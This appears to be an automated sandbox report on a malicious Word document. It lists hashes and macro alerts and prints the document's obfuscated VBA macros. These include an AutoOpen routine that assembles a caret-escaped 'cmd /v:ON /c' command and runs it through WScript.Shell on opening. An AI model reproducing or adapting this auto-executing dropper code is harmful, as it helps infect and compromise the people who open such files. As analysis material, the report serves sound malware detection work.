General

  • Target

    07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118

  • Size

    83KB

  • MD5

    07ee44f9fa9188be620b38bd4494fd6c

  • SHA1

    b079fbd5595c53ff4b8aee51aaece7792fb2eef6

  • SHA256

    fa22225bbaa33be9c57bf5bc3588b3e5dd4a6bcd531eb10fdf28ae5dc7c950f6

  • SHA512

    f86324391f3d32f7dde4d65bc70cfc1a260ae0b48dfa992bef94b604f775af0d0ed949245e8e6aff3163b788df0719f33502f0c9c0f49357d3360a95faa91db5

  • SSDEEP

    1536:SptJlmrJpmxlRw99NBk+aHJU4rTDUdUNAMeWT:Ote2dw99fb4r3UdqAMe

Malware Config

Signatures

  • Office macro that triggers on suspicious action (1 IoC)

    Office document contains a macro that runs automatically under specific conditions, such as the `AutoOpen` handler shown under Files below; this is often malicious.

  • Suspicious Office macro (1 IoC)

    Office document equipped with macros.

Files

  • 07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118
    .doc windows office2003

    EaQtQvZi

    Attribute VB_Name = "EaQtQvZi"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True

    GjWCjJazapR

    Attribute VB_Name = "GjWCjJazapR"
    Function LDVErTJs()
    On Error Resume Next
    Error 61956 * JuKbbO
    ERirvVifR = "md /v^:" + "^ON^ " + " ^ /c" + Chr(2 + 3 + 2 + 1 + 26) + " " + " ^Se" + "^T ^" + " A^K=A" + "^ACA^gA"
    Error 63986 * XMDXTr * JOwzq * fAnwYw
    Error 69710 * FJwJcM
    Error 98572 / ZWPJwP * JLoVuj * 88844
    PohwL = "A^I^A^" + "ACA^g" + "A^A" + "^" + "I^A^" + "AC^A^g" + "AAIA^AC" + "Ag^A^A" + "I^A"
    Error VwwJY / wRPYz

    umJJFLVjtf

    Attribute VB_Name = "umJJFLVjtf"
    Sub AutoOpen()
    On Error Resume Next
    Error lYVKNO / Xnbns
    Error WSEwz * QVzcKw / 60661 * wkirVV
    Error 62513 * zIacKW * 89634 * zpsut
    bwdnukzCO = CreateObject("WScript.Shell") _
    . _
    Run _
    (ChrW(3 + 5 + 9 + 11 + 39) + FRqPWUVUfbaE + rizjmazzZPXBF + LDVErTJs + QqtwSndqsl + zIUGwiLHwk + zzaRRzYGrvE + TIESXJwZMs + Yanrjzf + uBiIiVEfczn, 342822333 - 342822333)
